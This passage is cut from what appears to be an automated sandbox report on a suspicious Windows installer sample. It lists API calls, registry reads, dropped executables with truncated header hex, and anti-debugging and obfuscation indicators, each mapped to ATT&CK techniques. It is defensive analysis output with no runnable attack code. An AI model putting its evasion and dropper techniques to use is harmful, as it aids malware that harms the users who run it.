140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000590018f5120095e1907757032500feffffffff2b94779a2a94774411e16b000000000000000024f312002c325c77c0f31200c83ae77534f41200d58cdf7570f4120004f4120042a4dd75a802e77544f41200d2f4dd75080000006ef5dd7544f5dd75fb5f473602000000341ade6b000013005b51de6b02000000000000004411e16b989365004411e16b000000009893650088f41200086d947718819c7701000000000000000000de6b341ade6b000013005b51de6bd42c5900d02c590058f4120098f4120018f5120091e1e06b7ef0c8429cf41200c89f94774411e16b00000000 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000340032003200340038003400640038006300370038006500390030003000640030003600310030003200640030006600620066006600350037003500390038003700350035006500390037003700300035006200660065003400310039006300320034002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b9477f7eca377d8eb2776ac01620000006200000000000000000026003e00bd0000000000000000000000000000000000000027003900bd00000000000000000000001870620000000000200000000000000000000000 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007a724736f4da12006d821f76f479670004010000 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006700f07a6700eb7a67000000000000000000000062000000000104d112000000000068de120095e190776f0d2500feffffff435c947750599477aa000000b8000000ea7a6700e87a67008cd21200c4d61200000000000000000000000000000000000000000000000000e0100000000062001c5c937760d8a075ffffffff170000003cd2120024000000030000002cd7120058dc1200c4d612008600000068d2120096ed9477127b6700a06a6a75860000008cd21200c4d612000000000086008800a06a6a758cd21200916c6a75127b6700a06a6a75a06a6a75fcd6120002020000 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004412)\n \"Sibuia.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000003c11000080889c77586f5b0021000000c0e4b50176617476ffffffff0000b06aa8617476d321e32818e6b5010000b06a01000000d06f5b00d06e5b00d86f5b00d86e5b009c889c77e06f5b000000b06a8253b06a00c00800500052002099610028002a0048996100044000000100000030c69c778c5c5b001ddb5b4a0000000000000000a06f5b00a06f5b00a86f5b00a86f5b0078d86100a0d761008c0196770000371416ce03d3fa93db010000b06a00c008008253b06ab077214310e4b501c75bb06a38e5b501c2a27b76a3a4225ffeffffffbcc82428e8e4b5016f52b06a (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000620060b262005bb26200000000000000000000005900000000013cdab50100000000a0e7b50195e1907743222500feffffff435c947750599477aa000000b80000005ab2620058b26200c4dbb501fcdfb50100000000000000000000000000000000000000000000000000000000000000001c5c937760d8a075ffffffff1700000074dbb501240000000300000064e0b50190e5b501fcdfb50186000000a0dbb50196ed947782b26200a06a6a7586000000c4dbb501fcdfb5010000000086008800a06a6a75c4dbb501916c6a7582b26200a06a6a75a06a6a7534e0b50102020000 (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002688)\n \"sibjs.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000005d000000000054305d0000000000750000000000000030305d0009000000c08f6200000000008900000000000000800000000000000000000000000000000000000000000000030000038841620024310015000000000000000000000000ff0700000000000024310015c08f62000100000000000000020000000c00000050546200505462004b546200000000000000000000005d000000000188f5830000000000a8fb830095e19077c0242500feffffff435c94775059947794000000a00000004a54620048546200940000002cf78300fdfe75760000000018000000e76ad729 (UID: 00000000-00004172)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24]\n Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: Setup.exe]\n Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: Sibuia.exe]\n Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: Sibjs.exe]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-183", "relevance": 1, "name": "Calls APIs used for find file/directory path", "description": "Observed import api PathFindFileName (Source: Sibuia.exe)\n Observed import api PathFindFileName (Source: Sibjs.exe)", "origin": "Static Parser", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"IsWow64Process\" with parameter \"4412\" - (UID: 00000000-00004412)\n \"Sibuia.exe\" called \"IsWow64Process\" with parameter \"2688\" - (UID: 00000000-00002688)\n \"sibjs.exe\" called \"IsWow64Process\" with parameter \"4172\" - (UID: 00000000-00004172)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004412)\n \"Sibuia.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002688)\n \"sibjs.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004172)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"Sibuia.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sibjs.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"sibjs.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\SibClr.dll\" at 00000000-00004172-0000010C-4277270\n \"sibjs.exe\" queries volume information of \"C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.JScript\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.JScript.dll\" at 00000000-00004172-0000010C-4538081\n \"sibjs.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\SibCa.dll\" at 00000000-00004172-0000010C-4860723", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"sibjs.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"43010908\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\nsnAAD0.tmp (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\FutureApp\\*.* (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter 0 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter 1 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter 2 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter Ionic.Zip.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter sib.dat (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter SibCa.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter SibClr.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter Sibjs.exe (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter Sibuia.exe (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter Zip.dll (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\FutureApp\\0 (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\FutureApp (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter %LOCALAPPDATA%\\Temp (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter %USERPROFILE%\\AppData (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter C:\\Users (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\FutureApp\\0\\*.* (UID: 00000000-00004412)\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" called \"FindNextFileW\" with parameter Setup.exe (UID: 00000000-00004412)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"sibjs.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"sibjs.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.997988287079396", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" opened \"\\Device\\KsecDD\"\n \"Sibuia.exe\" opened \"\\Device\\KsecDD\"\n \"sibjs.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24]\n Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: Setup.exe]\n Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: Sibuia.exe]\n Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: Sibjs.exe]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"SibClr.dll\" claims program is from Mon Feb 28 17:52:31 2056\n \"Zip.dll\" claims program is from Tue Jun 4 00:01:28 2041", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 32768 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\0\\Setup.exe\": 4d5a50000200000004000f00ffff0000ff0000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ff10000e1fff09ff21ff014cff21ffff546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a24370000000000000000 ...\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 27978 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\1\\333.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 4608 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\039F3.tmp\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 32768 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibuia.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000280100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 32768 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Sibjs.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000180100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 32768 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\SibClr.dll\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 28032 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Zip.dll\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 32768 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FutureApp\\Ionic.Zip.dll\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe\" wrote 27688 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nsnAAD0.tmp\\siblog.dll\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"Setup.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\0\\Setup.exe]- [targetUID: 00000000-00002688]\n \"Sibuia.exe\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\Sibuia.exe]- [targetUID: 00000000-00004412]\n \"Sibjs.exe\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\Sibjs.exe]- [targetUID: 00000000-00002688]\n \"Ionic.Zip.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\Ionic.Zip.dll]- [targetUID: 00000000-00004412]\n \"333.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\FutureApp\\1\\333.exe]- [targetUID: 00000000-00004412]\n \"siblog.dll\" has type \"PE32 executable (DLL) (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\nsnAAD0.tmp\\siblog.dll]- [targetUID: 00000000-00004412]\n \"SibClr.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\SibClr.dll]- [targetUID: 00000000-00004172]\n \"Zip.dll\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\Zip.dll]- [targetUID: 00000000-00004412]\n \"039F3.tmp\" has type \"PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\FutureApp\\039F3.tmp]- [targetUID: 00000000-00004412]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24\" has section name .text with entropy \"6.458398214928006\"\n \"Setup.exe\" has section name .text with entropy \"6.480286628042228\"\n \"Setup.exe\" has section name .itext with entropy \"6.150585523530168\"\n \"Setup.exe\" has section name .data with entropy \"6.177864641492512\"\n \"Setup.exe\" has section name .reloc with entropy \"6.728160253041536\"\n \"Setup.exe\" has section name .rsrc with entropy \"6.824406724563519\"\n \"Sibuia.exe\" has section name .text with entropy \"6.50690013796754\"\n \"Sibuia.exe\" has section name .reloc with entropy \"6.574445068719567\"\n \"Sibjs.exe\" has section name .text with entropy \"6.524182533030328\"\n \"Sibjs.exe\" has section name .reloc with entropy \"6.567419668028116\"\n \"333.exe\" has section name .text with entropy \"6.712962136932442\"\n \"333.exe\" has section name .rsrc with entropy \"6.084026257052305\"\n \"333.exe\" has section name .reloc with entropy \"6.623012966548067\"\n \"siblog.dll\" has section name .text with entropy \"6.618533174600541\"\n \"siblog.dll\" has section name .reloc with entropy \"6.3647471325621465\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"sibjs.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 4172)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"Sibuia.exe\" called \"FileTimeToLocalFileTime\" with parameter 00c15ab0b262db01 & 00291f12bb62db01 (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00002688)\n \"Sibuia.exe\" called \"FileTimeToLocalFileTime\" with parameter HHv & 48b03a330394db01 (UID: 00000000-00002688)\n \"sibjs.exe\" called \"FileTimeToLocalFileTime\" with parameter HHv & 48b03a330394db01 (UID: 00000000-00004172)\n \"sibjs.exe\" called \"FileTimeToSystemTime\" (UID: 